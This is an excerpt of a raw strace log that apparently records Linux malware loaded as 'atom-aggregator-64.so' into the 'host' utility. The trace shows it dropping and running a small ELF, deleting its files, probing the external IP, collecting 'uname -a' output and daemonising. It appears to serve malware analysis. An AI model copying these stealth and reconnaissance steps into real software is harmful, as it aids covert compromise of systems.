  298. mmap(0x7f57d799b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7f57d799b000
  299. close(3)                                = 0
  300. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  301. open("/lib/x86_64-linux-gnu/liblzma.so.5", O_RDONLY) = 3
  302. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360,\0\0\0\0\0\0"..., 832) = 832
  303. fstat(3, {st_mode=S_IFREG|0644, st_size=141784, ...}) = 0
  304. mmap(NULL, 2236904, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7575000
  305. mprotect(0x7f57d7597000, 2093056, PROT_NONE) = 0
  306. mmap(0x7f57d7796000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x21000) = 0x7f57d7796000
  307. close(3)                                = 0
  308. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  309. open("/lib/x86_64-linux-gnu/libm.so.6", O_RDONLY) = 3
  310. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360>\0\0\0\0\0\0"..., 832) = 832
  311. fstat(3, {st_mode=S_IFREG|0644, st_size=530736, ...}) = 0
  312. mmap(NULL, 2625768, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d72f3000
  313. mprotect(0x7f57d7374000, 2093056, PROT_NONE) = 0
  314. mmap(0x7f57d7573000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x80000) = 0x7f57d7573000
  315. close(3)                                = 0
  316. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a8000
  317. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a7000
  318. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a6000
  319. mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a4000
  320. arch_prctl(ARCH_SET_FS, 0x7f57db0a4720) = 0
  321. mprotect(0x7f57d7573000, 4096, PROT_READ) = 0
  322. mprotect(0x7f57d7796000, 4096, PROT_READ) = 0
  323. [...]
  324. mprotect(0x7f57db2df000, 4096, PROT_READ) = 0
  325. mprotect(0x7f57db0c1000, 4096, PROT_READ) = 0
  326. munmap(0x7f57db0b1000, 56122)           = 0
  327. set_tid_address(0x7f57db0a49f0)         = 18141
  328. set_robust_list(0x7f57db0a4a00, 0x18)   = 0
  329. futex(0x7fff5d64a5ac, FUTEX_WAIT_BITSET_PRIVATE|FUTEX_CLOCK_REALTIME, 1, NULL, 7f57db0a4720) = -1 EAGAIN (Resource temporarily unavailable)
  330. rt_sigaction(SIGRTMIN, {0x7f57d9407ad0, [], SA_RESTORER|SA_SIGINFO, 0x7f57d9411030}, NULL, 8) = 0
  331. rt_sigaction(SIGRT_1, {0x7f57d9407b60, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x7f57d9411030}, NULL, 8) = 0
  332. rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
  333. getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0
  334. rt_sigaction(SIGINT, {0x7f57d9a58950, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
  335. rt_sigaction(SIGTERM, {0x7f57d9a58950, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
  336. rt_sigaction(SIGPIPE, {SIG_IGN, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
  337. rt_sigaction(SIGHUP, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
  338. rt_sigprocmask(SIG_BLOCK, [HUP INT TERM], NULL, 8) = 0
  339. socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
  340. close(3)                                = 0
  341. socket(PF_INET6, SOCK_STREAM, IPPROTO_IP) = 3
  342. getsockname(3, {sa_family=AF_INET6, sin6_port=htons(0), inet_pton(AF_INET6, "::", &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, [28]) = 0
  343. close(3)                                = 0
  344. socket(PF_FILE, SOCK_STREAM, 0)         = 3
  345. close(3)                                = 0
  346. futex(0x7f57d9c7f8ec, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  347. futex(0x7f57d9c7f744, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  348. brk(0)                                  = 0x7f57dd0d4000
  349. brk(0x7f57dd0f5000)                     = 0x7f57dd0f5000
  350. mmap(NULL, 266240, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db063000
  351. mmap(NULL, 8392704, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0x7f57d6af2000
  352. mprotect(0x7f57d6af2000, 4096, PROT_NONE) = 0
  353. clone(Process 18146 attached
  354. child_stack=0x7f57d72f1fd0, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0x7f57d72f29d0, tls=0x7f57d72f2700, child_tidptr=0x7f57d72f29d0) = 18146
  355. [pid 18141] mmap(NULL, 8392704, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0x7f57d62f1000
  356. [pid 18141] mprotect(0x7f57d62f1000, 4096, PROT_NONE) = 0
  357. [pid 18141] clone(Process 18147 attached
  358. child_stack=0x7f57d6af0fd0, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0x7f57d6af19d0, tls=0x7f57d6af1700, child_tidptr=0x7f57d6af19d0) = 18147
  359. [pid 18141] brk(0x7f57dd11a000)         = 0x7f57dd11a000
  360. [pid 18141] pipe([3, 5])                = 0
  361. [pid 18141] fcntl(3, F_GETFL)           = 0 (flags O_RDONLY)
  362. [pid 18141] fcntl(3, F_SETFL, O_RDONLY|O_NONBLOCK) = 0
  363. [pid 18141] epoll_create(64)            = 6
  364. [pid 18141] epoll_ctl(6, EPOLL_CTL_ADD, 3, {EPOLLIN, {u32=3, u64=3}}) = 0
  365. [pid 18141] mmap(NULL, 8392704, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0x7f57d5af0000
  366. [pid 18141] mprotect(0x7f57d5af0000, 4096, PROT_NONE) = 0
  367. [pid 18141] clone(Process 18148 attached
  368. child_stack=0x7f57d62effd0, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0x7f57d62f09d0, tls=0x7f57d62f0700, child_tidptr=0x7f57d62f09d0) = 18148
  369. [pid 18147] set_robust_list(0x7f57d6af19e0, 0x18) = 0
  370. [pid 18147] futex(0x7f57db06a07c, FUTEX_WAIT_PRIVATE, 1, NULL <unfinished ...>
  371. [pid 18146] set_robust_list(0x7f57d72f29e0, 0x18) = 0
  372. [pid 18146] futex(0x7f57db06808c, FUTEX_WAIT_PRIVATE, 1, NULL <unfinished ...>
  373. [pid 18148] set_robust_list(0x7f57d62f09e0, 0x18) = 0
  374. [pid 18148] epoll_wait(6,  <unfinished ...>
  375. [pid 18141] open("/usr/share/locale/C/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  376. [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  377. [pid 18141] open("/usr/share/locale/C/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  378. [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  379. [pid 18141] futex(0x7f57daa802c0, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  380. [pid 18141] open("/usr/share/locale/C/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  381. [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  382. [pid 18141] open("/usr/share/locale/C/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  383. [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  384. [pid 18141] futex(0x7f57d9c7f6f0, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  385. [pid 18141] futex(0x7f57d9c7f820, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  386. [pid 18141] futex(0x7f57daa802c4, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  387. [pid 18141] brk(0x7f57dd13b000)         = 0x7f57dd13b000
  388. [pid 18141] open("/usr/lib/ssl/openssl.cnf", O_RDONLY) = 7
  389. [pid 18141] fstat(7, {st_mode=S_IFREG|0644, st_size=10835, ...}) = 0
  390. [pid 18141] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  391. [pid 18141] read(7, "#\n# OpenSSL example configuratio"..., 4096) = 4096
  392. [pid 18141] read(7, "Netscape crash on BMPStrings or "..., 4096) = 4096
  393. [pid 18141] read(7, " this to avoid interpreting an e"..., 4096) = 2643
  394. [pid 18141] read(7, "", 4096)           = 0
  395. [pid 18141] close(7)                    = 0
  396. [pid 18141] munmap(0x7f57db0be000, 4096) = 0
  397. [pid 18141] futex(0x7f57d9a250ec, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  398. [pid 18141] open("/usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so", O_RDONLY) = 7
  399. [pid 18141] read(7, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320[\0\0\0\0\0\0"..., 832) = 832
  400. [pid 18141] fstat(7, {st_mode=S_IFREG|0644, st_size=93208, ...}) = 0
  401. [pid 18141] mmap(NULL, 2188288, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 7, 0) = 0x7f57d58d9000
  402. [pid 18141] mprotect(0x7f57d58ed000, 2097152, PROT_NONE) = 0
  403. [pid 18141] mmap(0x7f57d5aed000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 7, 0x14000) = 0x7f57d5aed000
  404. [pid 18141] close(7)                    = 0
  405. [pid 18141] mprotect(0x7f57d5aed000, 4096, PROT_READ) = 0
  406. [pid 18141] open("/usr/share/locale/C/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  407. [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  408. [pid 18141] open("/usr/share/locale/C/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  409. [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  410. [pid 18141] futex(0x7f57daa7f8cc, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  411. [pid 18141] futex(0x7f57daa7f9d0, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  412. [pid 18141] write(2, "Usage: host [-aCdlriTwv] [-c cla"..., 924Usage: host [-aCdlriTwv] [-c class] [-N ndots] [-t type] [-W time]
  413.             [-R number] [-m flag] hostname [server]
  414. [...]
  415. ) = 924
  416. [pid 18141] time(NULL)                  = 1407227107
  417. [pid 18141] getcwd("/home/mmd/0x02E/009", 4096) = 20
  418. [pid 18141] lstat("/home/mmd/0x02E/009/atom-aggregator-64.so", {st_mode=S_IFREG|0644, st_size=27272, ...}) = 0
  419. [pid 18141] getcwd("/home/mmd/0x02E/009", 4096) = 20
  420. [pid 18141] open("/home/mmd/0x02E/009/1.18141", O_WRONLY|O_CREAT|O_TRUNC, 0777) = 7
  421. [pid 18141] write(7, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0`\200\4\0104\0\0\0"..., 106) = 106
  422. [pid 18141] close(7)                    = 0
  423. [pid 18141] clone(Process 18150 attached
  424. child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f57db0a49f0) = 18150
  425. [pid 18141] wait4(-1, Process 18141 suspended
  426.  <unfinished ...>
  427. [pid 18150] execve("/home/mmd/0x02E/009/1.18141", ["/home/mmd/0x02E/009/1.18141"], [/* 20 vars */]) = 0
  428. [ Process PID=18150 runs in 32 bit mode. ]
  429. [pid 18150] _exit(99)                   = ?
  430. Process 18141 resumed
  431. Process 18150 detached
  432. [pid 18141] <... chroot resumed> )      = 18150
  433. [pid 18141] --- SIGCHLD (Child exited) @ 0 (0) ---
  434. [ Process PID=18141 runs in 64 bit mode. ]
  435. [pid 18141] unlink("/home/mmd/0x02E/009/1.18141") = 0
  436. [pid 18141] socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 7
  437. [pid 18141] connect(7, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
  438. [pid 18141] getsockname(7, {sa_family=AF_INET, sin_port=htons(55006), sin_addr=inet_addr("78.46.37.69")}, [16]) = 0
  439. [pid 18141] geteuid()                   = 1015
  440. [pid 18141] pipe2([9, 10], O_CLOEXEC)   = 0
  441. [pid 18141] clone(Process 18151 attached
  442. child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f57db0a49f0) = 18151
  443. [pid 18141] close(10)                   = 0
  444. [pid 18141] fcntl(9, F_SETFD, 0)        = 0
  445. [pid 18141] fstat(9, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
  446. [pid 18141] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  447. [pid 18141] read(9,  <unfinished ...>
  448. [pid 18151] close(9)                    = 0
  449. [pid 18151] dup2(10, 1)                 = 1
  450. [pid 18151] close(10)                   = 0
  451. [pid 18151] execve("/bin/sh", ["sh", "-c", "/bin/uname -a"], [/* 19 vars */]) = 0
  452. [pid 18151] brk(0)                      = 0xf3a000
  453. [pid 18151] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  454. [pid 18151] mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a86000
  455. [pid 18151] access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
  456. [pid 18151] open("/etc/ld.so.cache", O_RDONLY) = 9
  457. [pid 18151] fstat(9, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  458. [pid 18151] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 9, 0) = 0x7f9096a78000
  459. [pid 18151] close(9)                    = 0
  460. [pid 18151] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  461. [pid 18151] open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 9
  462. [pid 18151] read(9, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
  463. [pid 18151] fstat(9, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
  464. [pid 18151] mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 9, 0) = 0x7f90964de000
  465. [pid 18151] mprotect(0x7f9096660000, 2093056, PROT_NONE) = 0
  466. [pid 18151] mmap(0x7f909685f000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 9, 0x181000) = 0x7f909685f000
  467. [pid 18151] mmap(0x7f9096864000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f9096864000
  468. [pid 18151] close(9)                    = 0
  469. [pid 18151] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a77000
  470. [pid 18151] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a76000
  471. [pid 18151] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a75000
  472. [pid 18151] arch_prctl(ARCH_SET_FS, 0x7f9096a76700) = 0
  473. [pid 18151] mprotect(0x7f909685f000, 16384, PROT_READ) = 0
  474. [pid 18151] mprotect(0x7f9096a88000, 4096, PROT_READ) = 0
  475. [pid 18151] munmap(0x7f9096a78000, 56122) = 0
  476. [pid 18151] getpid()                    = 18151
  477. [pid 18151] rt_sigaction(SIGCHLD, {0x40f270, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
  478. [pid 18151] geteuid()                   = 1015
  479. [pid 18151] brk(0)                      = 0xf3a000
  480. [pid 18151] brk(0xf5b000)               = 0xf5b000
  481. [pid 18151] getppid()                   = 18141
  482. [pid 18151] stat("/home/mmd/0x02E/009", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
  483. [pid 18151] stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
  484. [pid 18151] rt_sigaction(SIGINT, NULL, {SIG_DFL, [], 0}, 8) = 0
  485. [pid 18151] rt_sigaction(SIGINT, {0x40f270, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
  486. [pid 18151] rt_sigaction(SIGQUIT, NULL, {SIG_DFL, [], 0}, 8) = 0
  487. [pid 18151] rt_sigaction(SIGQUIT, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
  488. [pid 18151] rt_sigaction(SIGTERM, NULL, {SIG_DFL, [], 0}, 8) = 0
  489. [pid 18151] rt_sigaction(SIGTERM, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
  490. [pid 18151] clone(Process 18152 attached
  491. child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f9096a769d0) = 18152
  492. [pid 18151] wait4(-1,  <unfinished ...>
  493. [pid 18152] execve("/bin/uname", ["/bin/uname", "-a"], [/* 19 vars */]) = 0
  494. [pid 18152] brk(0)                      = 0xef7000
  495. [pid 18152] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  496. [pid 18152] mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac571000
  497. [pid 18152] access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
  498. [pid 18152] open("/etc/ld.so.cache", O_RDONLY) = 9
  499. [pid 18152] fstat(9, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  500. [pid 18152] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 9, 0) = 0x7ffeac563000
  501. [pid 18152] close(9)                    = 0
  502. [pid 18152] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  503. [pid 18152] open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 9
  504. [pid 18152] read(9, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
  505. [pid 18152] fstat(9, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
  506. [pid 18152] mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 9, 0) = 0x7ffeabfc9000
  507. [pid 18152] mprotect(0x7ffeac14b000, 2093056, PROT_NONE) = 0
  508. [pid 18152] mmap(0x7ffeac34a000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 9, 0x181000) = 0x7ffeac34a000
  509. [pid 18152] mmap(0x7ffeac34f000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffeac34f000
  510. [pid 18152] close(9)                    = 0
  511. [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac562000
  512. [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac561000
  513. [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac560000
  514. [pid 18152] arch_prctl(ARCH_SET_FS, 0x7ffeac561700) = 0
  515. [pid 18152] mprotect(0x7ffeac34a000, 16384, PROT_READ) = 0
  516. [pid 18152] mprotect(0x606000, 4096, PROT_READ) = 0
  517. [pid 18152] mprotect(0x7ffeac573000, 4096, PROT_READ) = 0
  518. [pid 18152] munmap(0x7ffeac563000, 56122) = 0
  519. [pid 18152] brk(0)                      = 0xef7000
  520. [pid 18152] brk(0xf18000)               = 0xf18000
  521. [pid 18152] uname({sys="Linux", node="1x111", ...}) = 0
  522. [pid 18152] fstat(1, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
  523. [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac570000
  524. [pid 18152] write(1, "Linux 1x111 3.2.0-4-amd64 #1 SMP"..., 73) = 73
  525. [pid 18141] <... read resumed> "Linux 1x111 3.2.0-4-amd64 #1 SMP"..., 4096) = 73
  526. [pid 18141] close(9)                    = 0
  527. [pid 18141] wait4(18151, Process 18141 suspended
  528.  <unfinished ...>
  529. [pid 18152] close(1)                    = 0
  530. [pid 18152] munmap(0x7ffeac570000, 4096) = 0
  531. [pid 18152] close(2)                    = 0
  532. [pid 18152] exit_group(0)               = ?
  533. Process 18152 detached
  534. [pid 18151] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 18152
  535. [pid 18151] --- SIGCHLD (Child exited) @ 0 (0) ---
  536. [pid 18151] rt_sigreturn(0x11)          = 18152
  537. [pid 18151] exit_group(0)               = ?
  538. Process 18141 resumed
  539. Process 18151 detached
  540. [pid 18141] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 18151
  541. [pid 18141] --- SIGCHLD (Child exited) @ 0 (0) ---
  542. [pid 18141] munmap(0x7f57db0be000, 4096) = 0
  543. [pid 18141] unlink("/home/mmd/0x02E/009/atom-aggregator-64.so") = 0
  544. [pid 18141] open(".cache", O_RDWR)      = -1 ENOENT (No such file or directory)
  545. [pid 18141] unlink(".cache")            = -1 ENOENT (No such file or directory)
  546. [pid 18141] open(".cache", O_RDWR|O_CREAT|O_TRUNC, 0666) = 9
  547. [pid 18141] ftruncate(9, 12582912)      = 0
  548. [pid 18141] mmap(NULL, 12582912, PROT_READ|PROT_WRITE, MAP_SHARED, 9, 0) = 0x7f57d4cd9000
  549. [pid 18141] rt_sigaction(SIGPIPE, {SIG_IGN, [PIPE], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_IGN, ~[KILL STOP RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, 8) = 0
  550. [pid 18141] rt_sigaction(SIGCHLD, {SIG_IGN, [CHLD], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
  551. [pid 18141] rt_sigaction(SIGTSTP, {0x7f57dac9a0b4, [TSTP], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
  552. [pid 18141] rt_sigaction(SIGINT, {0x7f57dac9a0b4, [INT], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {0x7f57d9a58950, ~[KILL STOP RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, 8) = 0
  553. [pid 18141] rt_sigaction(SIGTTOU, {SIG_IGN, [TTOU], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
  554. [pid 18141] rt_sigaction(SIGTTIN, {SIG_IGN, [TTIN], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
  555. [pid 18141] clone(Process 18153 attached
  556. child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f57db0a49f0) = 18153
  557. [pid 18141] exit_group(0)               = ?
  558. Process 18141 attached (waiting for parent)
  559. [pid 18153] umask(0)                    = 022
  560. [pid 18153] setsid()                    = 18153
  561. [pid 18153] chroot("/")                 = -1 EPERM (Operation not permitted)
  562. [pid 18153] close(0)                    = 0
  563. [pid 18153] close(1)                    = 0
  564. [pid 18153] close(2)                    = 0
  565. [pid 18153] close(3)                    = 0
  566. [pid 18153] close(4)                    = 0
  567. [pid 18153] close(5)                    = 0
  568. [pid 18153] close(6)                    = 0
  569. [pid 18153] close(7)                    = 0
  570. [pid 18153] close(8)                    = 0
  571. [pid 18153] close(9)                    = 0
  572. [pid 18153] close(10)                   = -1 EBADF (Bad file descriptor)
  573. [pid 18153] close(11)                   = -1 EBADF (Bad file descriptor)
  574. [pid 18153] close(12)                   = -1 EBADF (Bad file descriptor)
  575.                [...]
  576. [pid 18153] close(1019)                 = -1 EBADF (Bad file descriptor)
  577. [pid 18153] close(1020)                 = -1 EBADF (Bad file descriptor)
  578. [pid 18153] close(1021)                 = -1 EBADF (Bad file descriptor)
  579. [pid 18153] close(1022)                 = -1 EBADF (Bad file descriptor)
  580. [pid 18153] close(1023)                 = -1 EBADF (Bad file descriptor)
  581. [pid 18153] open("/dev/null", O_RDONLY) = 0
  582. [pid 18153] open("/dev/null", O_RDONLY) = 1
  583. [pid 18153] open("/dev/null", O_RDONLY) = 2
  584. [pid 18153] open("/dev/null", O_RDONLY) = 3
  585. [pid 18153] time(NULL)                  = 1407227107
  586. [pid 18153] socket(PF_NETLINK, SOCK_RAW, 0) = 4
  587. [pid 18153] bind(4, {sa_family=AF_NETLINK, pid=0, groups=00000000}, 12) = 0
  588. [pid 18153] getsockname(4, {sa_family=AF_NETLINK, pid=18153, groups=00000000}, [12]) = 0
  589. [pid 18153] time(NULL)                  = 1407227107
  590. [pid 18153] sendto(4, "\24\0\0\0\26\0\1\3\343\224\340S\0\0\0\0\0\0\0\0", 20, 0, {sa_family=AF_NETLINK, pid=0, groups=00000000}, 12) = 20
  591. [pid 18153] recvmsg(4, {msg_name(12)={sa_family=AF_NETLINK, pid=0, groups=00000000}, msg_iov(1)=[{"0\0\0\0\24\0\2\0\343\224\340S\351F\0\0\2\10\200\376\1\0\0\0\10\0\1\0\177\0\0\1"..., 4096}], msg_controllen=0, msg_flags=0}, 0) = 108
  592. [pid 18153] recvmsg(4, {msg_name(12)={sa_family=AF_NETLINK, pid=0, groups=00000000}, msg_iov(1)=[{"\24\0\0\0\3\0\2\0\343\224\340S\351F\0\0\0\0\0\0\1\0\0\0\10\0\1\0\177\0\0\1"..., 4096}], msg_controllen=0, msg_flags=0}, 0) = 20
  593. [pid 18153] close(4)                    = 0
  594. [pid 18153] open("/etc/resolv.conf", O_RDONLY) = 4
  595. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=629, ...}) = 0
  596. [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  597. [pid 18153] read(4, "### Hetzner Online AG installima"..., 4096) = 629
  598. [pid 18153] read(4, "", 4096)           = 0
  599. [pid 18153] close(4)                    = 0
  600. [pid 18153] munmap(0x7f57db0be000, 4096) = 0
  601. [pid 18153] uname({sys="Linux", node="1x111", ...}) = 0
  602. [pid 18153] socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 4
  603. [pid 18153] connect(4, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
  604. [pid 18153] close(4)                    = 0
  605. [pid 18153] socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 4
  606. [pid 18153] connect(4, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
  607. [pid 18153] close(4)                    = 0
